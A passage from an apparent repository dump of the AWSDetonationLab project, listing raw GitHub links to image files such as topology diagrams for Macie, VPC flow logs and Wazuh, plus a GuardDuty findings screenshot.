-------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-macie.png -------------------------------------------------------------------------------- /images/Topology/Topology-vpcflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-vpcflow.png -------------------------------------------------------------------------------- /images/Topology/Topology-wazuh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-wazuh.png -------------------------------------------------------------------------------- /images/detonationLab-created.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/detonationLab-created.png -------------------------------------------------------------------------------- /images/guardDutyFindings-example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/guardDutyFindings-example.png --------------------------------------------------------------------------------